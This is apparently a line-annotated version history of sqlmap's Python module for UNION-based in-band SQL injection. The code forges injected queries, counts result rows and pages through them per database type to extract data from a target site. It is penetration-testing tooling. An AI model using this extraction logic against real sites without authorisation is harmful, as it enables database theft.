2008-10-15 19:38:22 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
|
|
"""
|
2008-10-15 19:56:32 +04:00
|
|
|
$Id$
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-10-14 18:41:14 +04:00
|
|
|
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
|
|
|
|
See the file doc/COPYING for copying permission.
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
|
|
2008-12-10 20:23:07 +03:00
|
|
|
import re
|
2008-10-15 19:38:22 +04:00
|
|
|
import time
|
|
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
2010-05-13 15:05:35 +04:00
|
|
|
from lib.core.common import calculateDeltaSeconds
|
2010-06-02 16:45:40 +04:00
|
|
|
from lib.core.common import getUnicode
|
2008-12-10 20:23:07 +03:00
|
|
|
from lib.core.common import parseUnionPage
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.data import conf
|
|
|
|
|
from lib.core.data import kb
|
|
|
|
|
from lib.core.data import logger
|
2008-12-10 20:23:07 +03:00
|
|
|
from lib.core.data import queries
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.data import temp
|
|
|
|
|
from lib.core.unescaper import unescaper
|
|
|
|
|
from lib.request.connect import Connect as Request
|
|
|
|
|
from lib.techniques.inband.union.test import unionTest
|
2008-12-10 20:23:07 +03:00
|
|
|
from lib.utils.resume import resume
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
reqCount = 0
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2010-04-30 19:48:40 +04:00
|
|
|
def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullChar="NULL", unpack=True, dump=False):
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
|
This function tests for an inband SQL injection on the target
|
|
|
|
|
url then call its subsidiary function to effectively perform an
|
|
|
|
|
inband SQL injection on the affected url
|
|
|
|
|
"""
|
|
|
|
|
|
2008-12-10 20:23:07 +03:00
|
|
|
count = None
|
|
|
|
|
origExpr = expression
|
|
|
|
|
start = time.time()
|
|
|
|
|
startLimit = 0
|
|
|
|
|
stopLimit = None
|
|
|
|
|
test = True
|
|
|
|
|
value = ""
|
|
|
|
|
|
|
|
|
|
global reqCount
|
|
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
if resetCounter:
|
2008-12-10 20:23:07 +03:00
|
|
|
reqCount = 0
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
|
if not kb.unionCount:
|
|
|
|
|
unionTest()
|
|
|
|
|
|
|
|
|
|
if not kb.unionCount:
|
|
|
|
|
return
|
|
|
|
|
|
|
|
|
|
# Prepare expression with delimiters
|
2008-12-10 20:23:07 +03:00
|
|
|
if unescape:
|
2009-04-22 15:48:07 +04:00
|
|
|
expression = agent.concatQuery(expression, unpack)
|
2008-12-10 20:23:07 +03:00
|
|
|
expression = unescaper.unescape(expression)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-03-22 18:39:29 +03:00
|
|
|
if ( kb.unionNegative or kb.unionFalseCond ) and not direct:
|
2009-04-22 15:48:07 +04:00
|
|
|
_, _, _, _, _, expressionFieldsList, expressionFields = agent.getFields(origExpr)
|
2008-12-10 20:23:07 +03:00
|
|
|
|
|
|
|
|
# We have to check if the SQL query might return multiple entries
|
|
|
|
|
# and in such case forge the SQL limiting the query output one
|
|
|
|
|
# entry per time
|
|
|
|
|
# NOTE: I assume that only queries that get data from a table can
|
|
|
|
|
# return multiple entries
|
|
|
|
|
if " FROM " in expression:
|
|
|
|
|
limitRegExp = re.search(queries[kb.dbms].limitregexp, expression, re.I)
|
|
|
|
|
|
|
|
|
|
if limitRegExp:
|
|
|
|
|
if kb.dbms in ( "MySQL", "PostgreSQL" ):
|
|
|
|
|
limitGroupStart = queries[kb.dbms].limitgroupstart
|
|
|
|
|
limitGroupStop = queries[kb.dbms].limitgroupstop
|
|
|
|
|
|
|
|
|
|
if limitGroupStart.isdigit():
|
|
|
|
|
startLimit = int(limitRegExp.group(int(limitGroupStart)))
|
|
|
|
|
|
|
|
|
|
stopLimit = limitRegExp.group(int(limitGroupStop))
|
|
|
|
|
limitCond = int(stopLimit) > 1
|
|
|
|
|
|
2009-01-03 02:26:45 +03:00
|
|
|
elif kb.dbms == "Microsoft SQL Server":
|
|
|
|
|
limitGroupStart = queries[kb.dbms].limitgroupstart
|
|
|
|
|
limitGroupStop = queries[kb.dbms].limitgroupstop
|
|
|
|
|
|
|
|
|
|
if limitGroupStart.isdigit():
|
|
|
|
|
startLimit = int(limitRegExp.group(int(limitGroupStart)))
|
|
|
|
|
|
|
|
|
|
stopLimit = limitRegExp.group(int(limitGroupStop))
|
|
|
|
|
limitCond = int(stopLimit) > 1
|
|
|
|
|
|
|
|
|
|
elif kb.dbms == "Oracle":
|
2008-12-10 20:23:07 +03:00
|
|
|
limitCond = False
|
|
|
|
|
else:
|
|
|
|
|
limitCond = True
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-12-10 20:23:07 +03:00
|
|
|
# I assume that only queries NOT containing a "LIMIT #, 1"
|
|
|
|
|
# (or similar depending on the back-end DBMS) can return
|
|
|
|
|
# multiple entries
|
|
|
|
|
if limitCond:
|
|
|
|
|
if limitRegExp:
|
|
|
|
|
stopLimit = int(stopLimit)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-12-10 20:23:07 +03:00
|
|
|
# From now on we need only the expression until the " LIMIT "
|
|
|
|
|
# (or similar, depending on the back-end DBMS) word
|
|
|
|
|
if kb.dbms in ( "MySQL", "PostgreSQL" ):
|
|
|
|
|
stopLimit += startLimit
|
|
|
|
|
untilLimitChar = expression.index(queries[kb.dbms].limitstring)
|
|
|
|
|
expression = expression[:untilLimitChar]
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-01-03 03:27:04 +03:00
|
|
|
elif kb.dbms == "Microsoft SQL Server":
|
|
|
|
|
stopLimit += startLimit
|
2010-04-30 19:48:40 +04:00
|
|
|
elif dump:
|
|
|
|
|
if conf.limitStart:
|
|
|
|
|
startLimit = conf.limitStart
|
|
|
|
|
if conf.limitStop:
|
|
|
|
|
stopLimit = conf.limitStop
|
2009-01-03 03:27:04 +03:00
|
|
|
|
2008-12-10 20:23:07 +03:00
|
|
|
if not stopLimit or stopLimit <= 1:
|
|
|
|
|
if kb.dbms == "Oracle" and expression.endswith("FROM DUAL"):
|
|
|
|
|
test = False
|
|
|
|
|
else:
|
|
|
|
|
test = True
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
if test:
|
2008-12-10 20:23:07 +03:00
|
|
|
# Count the number of SQL query entries output
|
|
|
|
|
countFirstField = queries[kb.dbms].count % expressionFieldsList[0]
|
|
|
|
|
countedExpression = origExpr.replace(expressionFields, countFirstField, 1)
|
|
|
|
|
|
|
|
|
|
if re.search(" ORDER BY ", expression, re.I):
|
|
|
|
|
untilOrderChar = countedExpression.index(" ORDER BY ")
|
|
|
|
|
countedExpression = countedExpression[:untilOrderChar]
|
|
|
|
|
|
|
|
|
|
count = resume(countedExpression, None)
|
|
|
|
|
|
|
|
|
|
if not stopLimit:
|
|
|
|
|
if not count or not count.isdigit():
|
|
|
|
|
output = unionUse(countedExpression, direct=True)
|
|
|
|
|
|
|
|
|
|
if output:
|
|
|
|
|
count = parseUnionPage(output, countedExpression)
|
|
|
|
|
|
|
|
|
|
if count and count.isdigit() and int(count) > 0:
|
|
|
|
|
stopLimit = int(count)
|
|
|
|
|
|
|
|
|
|
infoMsg = "the SQL query provided returns "
|
|
|
|
|
infoMsg += "%d entries" % stopLimit
|
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
2008-12-17 23:11:18 +03:00
|
|
|
elif count and not count.isdigit():
|
|
|
|
|
warnMsg = "it was not possible to count the number "
|
|
|
|
|
warnMsg += "of entries for the SQL query provided. "
|
|
|
|
|
warnMsg += "sqlmap will assume that it returns only "
|
|
|
|
|
warnMsg += "one entry"
|
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
|
|
stopLimit = 1
|
|
|
|
|
|
2008-12-10 20:23:07 +03:00
|
|
|
elif ( not count or int(count) == 0 ):
|
|
|
|
|
warnMsg = "the SQL query provided does not "
|
|
|
|
|
warnMsg += "return any output"
|
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
|
|
return
|
|
|
|
|
|
|
|
|
|
elif ( not count or int(count) == 0 ) and ( not stopLimit or stopLimit == 0 ):
|
|
|
|
|
warnMsg = "the SQL query provided does not "
|
|
|
|
|
warnMsg += "return any output"
|
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
|
|
return
|
|
|
|
|
|
|
|
|
|
for num in xrange(startLimit, stopLimit):
|
2008-12-23 01:48:44 +03:00
|
|
|
if kb.dbms == "Microsoft SQL Server":
|
2010-04-09 19:48:53 +04:00
|
|
|
field = expressionFieldsList[0]
|
2008-12-23 01:48:44 +03:00
|
|
|
elif kb.dbms == "Oracle":
|
2009-04-28 03:05:11 +04:00
|
|
|
field = expressionFieldsList
|
2008-12-22 22:36:01 +03:00
|
|
|
else:
|
2008-12-23 01:48:44 +03:00
|
|
|
field = None
|
2008-12-22 22:36:01 +03:00
|
|
|
|
|
|
|
|
limitedExpr = agent.limitQuery(num, expression, field)
|
2010-04-30 19:48:40 +04:00
|
|
|
output = resume(limitedExpr, None)
|
|
|
|
|
|
|
|
|
|
if not output:
|
|
|
|
|
output = unionUse(limitedExpr, direct=True, unescape=False)
|
2008-12-10 20:23:07 +03:00
|
|
|
|
|
|
|
|
if output:
|
|
|
|
|
value += output
|
2010-04-30 19:48:40 +04:00
|
|
|
parseUnionPage(output, limitedExpr)
|
2008-12-10 20:23:07 +03:00
|
|
|
|
|
|
|
|
return value
|
|
|
|
|
|
|
|
|
|
value = unionUse(expression, direct=True, unescape=False)
|
|
|
|
|
|
|
|
|
|
else:
|
|
|
|
|
# Forge the inband SQL injection request
|
2009-04-22 15:48:07 +04:00
|
|
|
query = agent.forgeInbandQuery(expression, nullChar=nullChar)
|
2008-12-10 20:23:07 +03:00
|
|
|
payload = agent.payload(newValue=query)
|
|
|
|
|
|
2009-07-25 15:45:23 +04:00
|
|
|
# NOTE: for debug purposes only
|
|
|
|
|
#debugMsg = "query: %s" % payload
|
2009-04-22 15:48:07 +04:00
|
|
|
debugMsg = "query: %s" % query
|
|
|
|
|
logger.debug(debugMsg)
|
2008-12-10 20:23:07 +03:00
|
|
|
|
|
|
|
|
# Perform the request
|
2008-12-18 23:48:23 +03:00
|
|
|
resultPage, _ = Request.queryPage(payload, content=True)
|
2008-12-10 20:23:07 +03:00
|
|
|
reqCount += 1
|
|
|
|
|
|
|
|
|
|
if temp.start not in resultPage or temp.stop not in resultPage:
|
|
|
|
|
return
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-12-10 20:23:07 +03:00
|
|
|
# Parse the returned page to get the exact inband
|
|
|
|
|
# sql injection output
|
|
|
|
|
startPosition = resultPage.index(temp.start)
|
|
|
|
|
endPosition = resultPage.rindex(temp.stop) + len(temp.stop)
|
2010-06-02 16:45:40 +04:00
|
|
|
value = getUnicode(resultPage[startPosition:endPosition])
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-05-13 15:05:35 +04:00
|
|
|
duration = calculateDeltaSeconds(start)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
debugMsg = "performed %d queries in %d seconds" % (reqCount, duration)
|
|
|
|
|
logger.debug(debugMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
|
return value
|
